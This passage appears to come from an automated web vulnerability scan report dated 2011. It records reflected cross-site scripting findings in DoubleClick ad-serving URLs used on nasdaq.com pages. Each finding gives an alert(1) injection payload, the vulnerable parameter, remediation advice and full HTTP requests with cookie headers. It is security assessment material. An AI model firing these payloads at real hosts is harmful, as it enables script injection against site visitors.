<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxAf4152"-alert(1)-"49a024bfa21&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167474"); var fscUrl = url; var fscUrlClickTag ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6b8"-alert(1)-"95da157adb8 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912dd6b8"-alert(1)-"95da157adb8&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 17:01:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7051
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... HMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912dd6b8"-alert(1)-"95da157adb8&adurl=http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167474"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71b9d"-alert(1)-"d04127b78cd was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=171b9d"-alert(1)-"d04127b78cd&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 17:00:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7051
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... cs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=171b9d"-alert(1)-"d04127b78cd&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167474"); var fscUrl = url; var fscUrlClickTagFound ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 286b1"-alert(1)-"5e5112ed688 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ286b1"-alert(1)-"5e5112ed688&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 17:00:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7051
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ286b1"-alert(1)-"5e5112ed688&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167474"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44376"-alert(1)-"e277c536da2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l44376"-alert(1)-"e277c536da2&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 13 Feb 2011 16:59:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7051
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/f/1ba/%2a/x%3B232375206%3B0-0%3B0%3B50145855%3B3454-728/90%3B38381417/38399174/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l44376"-alert(1)-"e277c536da2&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNy ...[SNIP]...
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a89a'-alert(1)-'99c363fa133 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/exttrad.nasdaq.com/ahi_pmi;tile=6a89a'-alert(1)-'99c363fa133 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/reference/guru.stm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 473
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 02:10:49 GMT
Expires: Sun, 13 Feb 2011 02:10:49 GMT
2.26. http://ad.doubleclick.net/adj/footer.nasdaq.com/fidelity [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/footer.nasdaq.com/fidelity
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6513a'-alert(1)-'c5411f1f742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/footer.nasdaq.com/fidelity;tile=11;;abr=!webtv;key=value;sz=120x60;ord=%7B793802500935271400%7D?&6513a'-alert(1)-'c5411f1f742=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 01:44:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 447
2.27. http://ad.doubleclick.net/adj/home.nasdaq.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/home.nasdaq.com/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 749ff'-alert(1)-'0b97bdabd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/home.nasdaq.com/;tile=6;;abr=!webtv;key=value;sz=120x60;ord=%7B563948719995096300%7D?&749ff'-alert(1)-'0b97bdabd9a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nasdaq.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 01:54:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 454
2.28. http://ad.doubleclick.net/adj/home.nasdaq.com/ROSToolbar [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/home.nasdaq.com/ROSToolbar
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6e8'-alert(1)-'d05e78d7e75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/home.nasdaq.com/ROSToolbar;tile=2;;abr=!webtv;key=value;sz=185x35;ord=%7B121342767495661970%7D?&dd6e8'-alert(1)-'d05e78d7e75=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 01:44:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 447
2.29. http://ad.doubleclick.net/adj/home.nasdaq.com/home3 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/home.nasdaq.com/home3
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b29'-alert(1)-'506a24f435b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/home.nasdaq.com/home3;tile=6;;abr=!webtv;key=value;sz=120x60;ord=%7B353306817589327700%7D?&37b29'-alert(1)-'506a24f435b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nasdaq.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 01:55:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 459
2.30. http://ad.doubleclick.net/adj/invprod.nasdaq.com/heatmap [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/invprod.nasdaq.com/heatmap
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dca1'-alert(1)-'fbfe5276934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/invprod.nasdaq.com/heatmap;tile=4;;abr=!webtv;key=value;sz=120x60;ord=%7B785258022835478100%7D?&7dca1'-alert(1)-'fbfe5276934=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://quotes.nasdaq.com/screening/heatmaps.stm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 02:12:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 486
2.31. http://ad.doubleclick.net/adj/quotes.nasdaq.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adj/quotes.nasdaq.com/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc1e0'-alert(1)-'423ee8b9ac6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/quotes.nasdaq.com/;tile=12;;abr=!webtv;key=value;sz=88x31;ord=%7B970103129278868500%7D?&dc1e0'-alert(1)-'423ee8b9ac6=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 01:44:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 430
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65a03'%3balert(1)//3ff7d710d19 was submitted in the tile parameter. This input was echoed as 65a03';alert(1)//3ff7d710d19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/quotes.nasdaq.com/;tile=65a03'%3balert(1)//3ff7d710d19 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nasdaq.com/aspx/market-headlines.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 555
